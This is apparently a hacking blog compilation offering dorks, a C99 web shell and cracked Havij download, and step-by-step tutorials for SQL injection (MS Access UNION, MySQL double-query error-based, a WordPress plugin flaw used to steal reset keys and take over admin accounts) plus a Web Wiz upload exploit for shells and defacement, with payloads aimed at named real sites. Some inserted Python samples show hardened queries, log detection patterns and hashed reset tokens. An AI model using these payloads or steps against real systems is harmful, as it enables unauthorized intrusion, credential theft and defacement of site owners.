Notice Board

PatTakhaZOne is for educational purposes only. As you know, roughly 90% of patches, cracking tools and hacking software contain a virus. Every tool on PatTakhaZOne has been checked and is trusted :) I check each piece of software myself before uploading it. I hope you will like my posts. (Every software is 100% secure and trusted.) All information on this blog is for educational purposes only.

Showing posts with label Website Hacking.

View Hidden Password in Browser




Live Cameras Around The World



Go to Google and search any of the texts given below and peep through Live cameras around the world


  • inurl:”CgiStart?page=”
  • inurl:/view.shtml* intitle:”Live View / — AXIS
  • inurl:view/view.shtml
  • inurl:ViewerFrame?Mode=
  • inurl:ViewerFrame?Mode=Refresh
  • inurl:axis-cgi/jpg

You can Play Mp3 Movie Directly On Chrome

Did you know you can play MP3s and movies directly in the Chrome browser? Just drag the files into a Chrome window.


Check a website is safe

Check whether a website is safe to visit by replacing the domain name at the end of this URL (shown in red in the original post) with the website's domain name:


http://www.google.com/safebrowsing/diagnostic?site=PattakhaZOne.blogspot.com



C99 Shell For Free Download






5000 Fresh Google Dorks List for SQL injection

Latest Google Dorks For Hacking

We call them 'googledorks': Inept or foolish people as revealed by Google. Whatever you call these fools, you've found the center of the Google Hacking. I need to see if a site I am testing is vulnerable to any of the multiple Google dorks that are available at sites like this and this





Deface Page Creator v1

The BeSt One ** DEFACE PAGE CREATOR v1 **



Havij 1.16 Pro Cracked Portable With Video Tutorial


Havij 1.16 Pro Cracked Portable Full Download




Download SQL Poizon v1.1 - The Exploit Scanner Free Full








SQL Poizon is a tool used to find and evaluate websites vulnerable to SQL injection.

The SQL Poizon tool includes PHP, ASP, RFI and LFI dorks. Using it you can find vulnerable sites, such as sites vulnerable to SQL injection, find vulnerable sites by country, hack those sites, and browse the sites from within the tool.

Procedure for using SQL Poizon:

1)  First download SQL Poizon software from the download link below. 

2) Run Sql Poizon v1.1 

3) Once you run it, you have to select a dork. After you have selected the desired dork press Scan and it'll show the results in the Result Panel.

4) Now you have to send the results to the Sqli Crawler. You can do this by right clicking in the Results Panel and select "Send to Sqli Crawler -> All"

5) Now the Sqli Crawler tab will open and all you have to do is click Crawl and it will check if the website is vulnerable to SQL Injection or not.

6) Now you have to press Export Results and place it somewhere where you can open it later for further exploitation.




How to Find Vulnerable Website In Urdu

You will have read that vulnerable sites get hacked because they are not properly updated or configured. To find them we will use SQL Poizon, which I will give you to download.

Now open it and run it. Click on SQL Dork and select PHP or any other dork; I selected PHP, for example. After that, select any dork URL; I selected index.php, for example.

As the third step, click the Scan button and the scan will start, as it did for me. In the watch window you will see: Search Completed.
Url's Found: 64 or 34 or whatever.

Now, in the Result Panel below, tick any one website, right-click it and choose Send To SQLI Crawler,

then click All. Your Crawl panel will now open.
Here, click Crawl and crawling of these websites will begin.

At the end you will get the result: the websites that are vulnerable will be marked non-clear .... All the vulnerable sites are under the link below.

You can hack them easily.

HACK Websites Using THE Web Wiz Vulnerability



Today I'm going to tell you how to hack a website using a vulnerability called the RTE Webwiz vulnerability.
Webwiz rich text editor HTML code is carried in the open after they are sent charCode due functioning of the page.


STEPS:

1) Go to Google and type in any of these dorks:
inurl:rte/my_documents/my_files
inurl:/my_documents/my_files/
2) Open any site and replace everything after "http://site.com/" with the following exploit then press enter:
rte/RTE_popup_file_atch.asp
3) Now the site's url will look like "site.com/rte/RTE_popup_file_atch.asp "

4) Now you will be redirected here:


5) Now you can upload your shell or directly upload your deface page

6) Now when you click upload you will get the file URL in the "FILE URL" textbox...


MS Access Injection on Live Site

Today I'm going to discuss MS Access injection, which is really rare and weird too. Hardly any websites still use it.

Introduction

MS Access is commonly thought of as the little brother of Database engines, and not a lot of material has been published about methods used for exploiting it during a penetration test. MS Jet is often mistakenly thought of as being another name for MS Access, when in fact it is a database engine that is shipped as part of the Windows OS. MS Jet was however the core database engine used by MS Access up to version 2007. Since version 2007, MS Access has included a separate updated engine known as Access Connectivity Engine. Although MS Jet is not as complex as more advanced databases such as SQL server or Oracle, it is still commonly used by smaller web sites that want quick and easy database storage.

Default Tables Used In Access

Note: Table names marked with * can be used in a query.

Access 97

  • MSysAccessObjects *
  • MSysACEs
  • MSysModules
  • MSysModules2 *
  • MSysObjects
  • MSysQueries
  • MSysRelationships


Access 2000

  • MSysAccessObjects *
  • MSysAccessXML *
  • MSysACEs
  • MSysObjects
  • MSysQueries
  • MSysRelationships



Access 2002-2003

  • MSysAccessStorage *
  • MSysAccessXML *
  • MSysACEs
  • MSysObjects
  • MSysQueries
  • MSysRelationships



Access 2007

  • MSysAccessStorage *
  • MSysACEs
  • MSysComplexColumns
  • MSysComplexType_Attachment
  • MSysComplexType_Decimal
  • MSysComplexType_GUID
  • MSysComplexType_IEEEDouble
  • MSysComplexType_IEEESingle
  • MSysComplexType_Long
  • MSysComplexType_Short
  • MSysComplexType_Text
  • MSysComplexType_UnsignedByte
  • MSysNavPaneGroupCategories *
  • MSysNavPaneGroups *
  • MSysNavPaneGroupToObjects *
  • MSysNavPaneObjectIDs *
  • MSysObjects
  • MSysQueries
  • MSysRelationships



As we can see, each version has some new default tables, and each of them works differently. But MS Access injection is a real pain: it does not contain a schema, which means we have to guess each table and column. Access also does not support error-based injection, nor does it have global variables like @@version. So we can guess the version from the default tables.

Column Enumeration and Union

We will use # to comment out the rest of the query instead of -- or /*.

Step-1

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103

The site above is vulnerable to SQL injection. Let's see what error we get:

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103'

Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
  [Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'DISTRICTNUMBER = 103''.
   /h_reps/members.asp, line 16
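
The error text above shows the `id` value being concatenated into the `DISTRICTNUMBER = ...` expression and the driver message being returned to the client. The following is an added example (not code from the original post or from the site) of that handler shape next to a hardened one. It uses Python's sqlite3 as a stand-in for the Access/ODBC back end; the table contents, function names and the four-digit limit are assumptions made for illustration.

```python
import sqlite3

def make_db():
    """Constructed in-memory table standing in for the site's Access database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (DISTRICTNUMBER INTEGER, name TEXT)")
    db.executemany("INSERT INTO members VALUES (?, ?)",
                   [(102, "Member A"), (103, "Member B")])
    return db

def respond_vulnerable(db, raw_id):
    """'Before': id is pasted into the SQL text and driver errors reach the client."""
    sql = "SELECT name FROM members WHERE DISTRICTNUMBER = " + raw_id
    try:
        return {"status": 200, "body": [row[0] for row in db.execute(sql)]}
    except sqlite3.Error as exc:
        return {"status": 500, "body": str(exc)}  # error disclosure

def respond_hardened(db, raw_id):
    """'After': validate the id, bind it as a parameter, return a fixed error body."""
    # Assumed rule: a district number is 1 to 4 ASCII digits.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 4):
        return {"status": 400, "body": "Invalid district number"}
    try:
        rows = db.execute("SELECT name FROM members WHERE DISTRICTNUMBER = ?",
                          (int(raw_id),)).fetchall()
    except sqlite3.Error:
        # The detail belongs in the server log, not in the response.
        return {"status": 500, "body": "Internal error"}
    return {"status": 200, "body": [row[0] for row in rows]}

if __name__ == "__main__":
    db = make_db()
    for value in ("103", "103'", "103 order by 1", "103 order by 35"):
        print(repr(value), respond_vulnerable(db, value), respond_hardened(db, value))
```

With the hardened handler, a quote or an appended `order by N` gets the same fixed 400 response whatever N is, so the response no longer reveals whether the query parsed or how many columns it selects.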

Step-2

Using order by to get columns.

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 1# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 2# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 3# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 4# <== No error
We keep incrementing by 1 until we get an error:

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 35# <== Error

That means the total number of columns is 34. Let's proceed with UNION now.

If we are not sure about the data type, we can proceed with NULL instead of integers.

Step-3

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30​,31,32,33,34 from MSysAccessObjects#

We have used a default table name from MS Access 2000; see the list above.
Now on your screen you can see some numbers right under the page contents, like 17 19 20.

The most common tables are below:

  • users
  • admin
  • administrator
  • login
  • customers
  • user
  • members
  • member
  • customer


Step-4: Getting table

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30​,31,32,33,34 from members#

The page loads normally, which means we have found a valid table. Now let's enumerate columns.

Step-5 : Getting Columns

We will use GROUP BY and HAVING, for example:

GROUP BY tablename.column1 having 1=1#
GROUP BY tablename.column1,column2 having 1=1#
GROUP BY tablename.column1,column2,column(n).... having 1=1#

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30​,31,32,33,34 from members group by members.id#


The page will load without any error. Now let's put it in place of one of the column numbers:

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,id,18,19,20,21,22,23,24,25,26,27,28,29,30​,31,32,33,34 from members#


We have got the following data:
Code:
COMMITTEE ASSIGNMENTS
102

Now let's get next column

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,
  11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from members group by members.id,
  now having 1=1#


The page will load without any error. Now let's put it in place of one of the column numbers:

Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,now,18,19,20,21,22,23,24,25,26,27,28,29,3​0,31,32,33,34 from members#


we have got the following data

Sql injection [Double Query Error Based]



This tutorial is about how to hack a website through double query error-based SQL injection.

So for this you first need a vulnerable site.

OK, after getting a vulnerable site, you get the column count as usual.

Suppose it has 4 columns, so your next command will be:

Code:
www.vulnsite.com/index.php?id=-12 union select 1,2,3,4--
but when you press enter it gives an error :-0

The error is:
Code:
(select statement have different numbers of column)

So now what?

Don't be confused; it's time to use double query SQL injection.

So your command will look like this:

Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(version())+from+information_schema.tables+limit+0​,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)

and the result will look like this:

Code:
"Duplicate entry '5.0.92-community-log1' for key 1"

So here '5.0.92-community-log1' is the site's version.


Now we have to find the site's current_user, so our command will be:

Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(current_user())+from+information_schema.tables+li​mit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)


result
Code:
"Duplicate entry user+1' for key 1"


OK, now we will find tables with this command:

Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(table_name)+from+information_schema.tables+limit+​0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)

result should be
Code:
"duplicate entry 'table_name1' for key 1'

Now keep increasing the limit; you can find it near
Code:
((table_name)+from+information_schema.tables+limit+0,1) )
Here change the limit '0,1' to 1,1, then 2,1, until you get the error.


OK, now we will find the tables which contain the data, so our command will be:

Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(table_name)+from+information_schema.tables+where+​table_schema=database()+limit+0,1),floor(Rand(0)*2))a+from+information_schema.ta​bles+group+by+a)b)

result
Code:
"duplicate entry tablename1' for key 1"

So here again increase the limit's value until you get a table like user, admin, login, etc.

OK, now suppose we have the table name "user", so the next step is to find the columns of this table. Our command will be:

Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(column_name)+from+information_schema.columns+wher​e+table_name=<hex value of table>+limit+0,1),floor(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)

result
Code:
"Duplicate entry 'column name1' for key 1'

You can change text to hex here: http://www.swingnote.com/tools/texttohex.php

Again, keep changing the limit's value until you get columns like username, password, etc.

OK, now we have the columns username and password and we need the data inside the columns, so our command will be:

Code:
www.site.com/index.php?id=-12+and+(select+1+from(select count(*),concat((select+concat(username,0x3a,password)+from+user+limit+0,1),floo​r(Rand(0)*2))a+from+information_schema.tables+group+by+a)b)

result
Code:
"Duplicate entry 'Admin:452875204827e1f25994a3da414587125' for key 1"
If the password is hashed, then you have to crack that hash.
You can crack that hash with a site, namely
Code:
http://md5decrypter.co.uk
So now you have the user and password login; do what you guys want and enjoy.

POSTED BY PATTAKHA MUNDA
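
A detection-side view of the request shapes in the tutorials above, as an added example (not code from the original posts): a scanner that normalises each logged request and flags the double-query pattern, schema and MSys table reads, reset-key reads and ORDER BY column counting. The rule names, function names and log lines are constructed for illustration; the normaliser also strips the zero-width characters that payloads pick up when copied from web pages.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote_plus

LOG = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INVISIBLE = dict.fromkeys(map(ord, "\u200b\u200c\u200d\u2060\ufeff"))
ORDER_BY = re.compile(r"\border by (\d+)")
RULES = {
    "double_query_error": re.compile(r"count\(\*\).*floor\(rand\(\d*\)\*2\).*group by"),
    "schema_enumeration": re.compile(r"information_schema\.(?:tables|columns)"),
    "union_select": re.compile(r"\bunion (?:all )?select\b"),
    "access_system_table": re.compile(r"\bfrom msys\w+"),
    "wp_reset_key_read": re.compile(r"\buser_activation_key\b"),
}

def normalise(target):
    """Decode the query string, drop invisible characters, collapse whitespace."""
    text = unquote_plus(urlsplit(target).query).translate(INVISIBLE)
    text = re.sub(r"/\*.*?\*/", " ", text)  # inline comments used as separators
    return re.sub(r"\s+", " ", text).lower()

def scan(lines):
    """Return (hits, sweeps): rule names per line number, ORDER BY sweeps per client."""
    hits, probes = {}, defaultdict(set)
    for number, line in enumerate(lines, 1):
        if not (match := LOG.match(line)):
            continue
        client, text = match.group(1), normalise(match.group(2))
        names = [name for name, rule in RULES.items() if rule.search(text)]
        if names:
            hits[number] = names
        probes[client].update(int(n) for n in ORDER_BY.findall(text))
    # Three or more distinct ORDER BY indexes from one client is column counting.
    sweeps = {c: max(v) for c, v in probes.items() if len(v) >= 3}
    return hits, sweeps

# Constructed access-log lines: documentation addresses, shortened column lists.
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /members.asp?id=103 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:02:11 +0000] "GET /members.asp?id=103%20order%20by%201 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:02:12 +0000] "GET /members.asp?id=103%20order%20by%202 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:02:40 +0000] "GET /members.asp?id=103%20order%20by%2035 HTTP/1.1" 500 310',
    '198.51.100.7 - - [01/Jan/2024:10:03:05 +0000] "GET /members.asp?id=103%20UNION%20SELECT%201,2,3%20from%20MSysAccessObjects HTTP/1.1" 200 5300',
    '203.0.113.5 - - [01/Jan/2024:11:15:00 +0000] "GET /index.php?id=-12+and+(select+1+from(select+count(*),concat(version(),floor(Rand(0)*2))a+from+information_schema.ta%E2%80%8Bbles+group+by+a)b) HTTP/1.1" 200 812',
    '203.0.113.5 - - [01/Jan/2024:11:20:00 +0000] "GET /playlist.php?videoid=-3+UNION+SELECT+1,group_concat(user_login,0x3a,user_activation_key)+FROM+wp_users-- HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    print(scan(SAMPLE))
```

The sweep value is the highest ORDER BY index a client probed; together with the 500 on that request it tells the responder which endpoint was being measured.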

[Tutorial] Hack WordPress site with SQL injection


As requested by a few of you, I decided to make this small tutorial on how to hack a WordPress site that has an SQLi in a plugin.


So let's begin.

I will use this 0day here by AMY hacker.

First of all we need to find a vulnerable page.
We enter this in Google:

Code:
# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="

# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="

# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"

Once you have found your site, you need to find the admin email and username.
I will be using this site as an example:


Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=3



When I add ', the text disappears, so it is vulnerable.






NOTE: I will not demonstrate how to SQL inject.

Now we need admin username and email.
We need to inject:



Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--



Now we have 2 users.





We pick one and copy his email.
Go to the login page of the site.
It is usually here:


Code:
http://www.site.com/wp-login.php

And press "Lost your password?" 




Now you enter either the username or the email.
We can enter either, so it doesn't matter.
I entered the email.




Now when you get:

"Check your e-mail for the confirmation link."

it means that the reset key was successfully sent.
Now we need to get the activation key.

Go back to the syntax you used for extracting email and username and do this:



Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--




Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--






Voila!
Now we just need to reset it.



Go to:


Code:
wp-login.php?action=rp&key=resetkey&login=username

NOTE: Replace key= & login= 

So my link will be:




Login with new password and shell it.
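
The takeover above works because the value read from `wp_users.user_activation_key` is itself accepted as the reset key. The following is an added example (not code from the original post or from WordPress) of a reset flow that stores only a digest of the token, so a read-only SQL injection does not yield a usable key. The function names, the in-memory store and the one-hour lifetime are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
import time

RESET_TTL = 3600  # seconds a reset link stays valid (assumed policy)

def _digest(token):
    # The token is 32 random bytes, so a plain SHA-256 digest is sufficient here.
    return hashlib.sha256(token.encode()).hexdigest()

def issue_reset(store, login, now=None):
    """Create a reset token; persist only its digest and an expiry time."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    store[login] = {"key_digest": _digest(token), "expires": now + RESET_TTL}
    return token  # goes into the e-mailed link, never into the database

def redeem_reset(store, login, presented, now=None):
    """Accept a token once, if its digest matches and it has not expired."""
    now = time.time() if now is None else now
    record = store.get(login)
    if record is None:
        return False
    ok = (hmac.compare_digest(_digest(presented), record["key_digest"])
          and now <= record["expires"])
    if ok:
        del store[login]  # single use
    return ok

if __name__ == "__main__":
    store = {}  # stands in for the users table
    token = issue_reset(store, "admin", now=1000)
    leaked = store["admin"]["key_digest"]  # what a database read would expose
    print("leaked column value accepted:", redeem_reset(store, "admin", leaked, now=1001))
    print("e-mailed token accepted:", redeem_reset(store, "admin", token, now=1001))
```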